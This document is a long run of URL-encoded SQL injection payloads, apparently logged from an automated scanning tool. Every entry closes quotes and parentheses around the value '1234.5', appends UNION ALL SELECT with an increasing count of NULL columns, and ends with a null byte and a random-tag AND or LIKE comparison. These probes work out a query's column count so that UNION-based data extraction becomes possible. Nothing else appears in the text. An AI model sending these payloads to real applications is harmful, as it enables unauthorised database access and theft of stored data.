1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27WFkJ%27%3D%27WFkJ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27eTWe%27%3D%27eTWe 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27HRcR%27%3D%27HRcR 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27oOKx%27%3D%27oOKx 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27hGZk%27%3D%27hGZk 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27zqFe%27%3D%27zqFe 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27zRaL%27%3D%27zRaL 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27WGil%27%3D%27WGil 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27veOG%27%3D%27veOG 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27VBin%27%3D%27VBin 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27jccD%27%3D%27jccD 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27Hjsy%27%3D%27Hjsy 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27urxe%27%3D%27urxe 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27UmiT%27%3D%27UmiT 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27fvxN%27%3D%27fvxN 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27MgWw%27%3D%27MgWw 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27Xspp%27%3D%27Xspp 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27SKJd%27%3D%27SKJd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27GbeZ%27%3D%27GbeZ 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Carn%27%3D%27Carn 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27gSCT%27%3D%27gSCT 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27qgEJ%27%3D%27qgEJ 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Otma%27%3D%27Otma 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27XGFN%27%3D%27XGFN 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27ZtFx%27%3D%27ZtFx 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27rZuH%27%3D%27rZuH 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27FEHy%27%3D%27FEHy 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27VqMd%27%3D%27VqMd 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27QnhM%27%3D%27QnhM 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27TVbM%27%20LIKE%20%27TVbM 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27aLhZ%27%20LIKE%20%27aLhZ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Acve%27%20LIKE%20%27Acve 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27PXLb%27%20LIKE%20%27PXLb 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27IXaE%27%20LIKE%20%27IXaE 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27jSwK%27%20LIKE%20%27jSwK 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27SMDH%27%20LIKE%20%27SMDH 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27FydO%27%20LIKE%20%27FydO 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27jNnJ%27%20LIKE%20%27jNnJ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27hRrF%27%20LIKE%20%27hRrF 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27vUTT%27%20LIKE%20%27vUTT 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27tAAu%27%20LIKE%20%27tAAu 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27GLuI%27%20LIKE%20%27GLuI 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27iBOV%27%20LIKE%20%27iBOV 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27qLSP%27%20LIKE%20%27qLSP 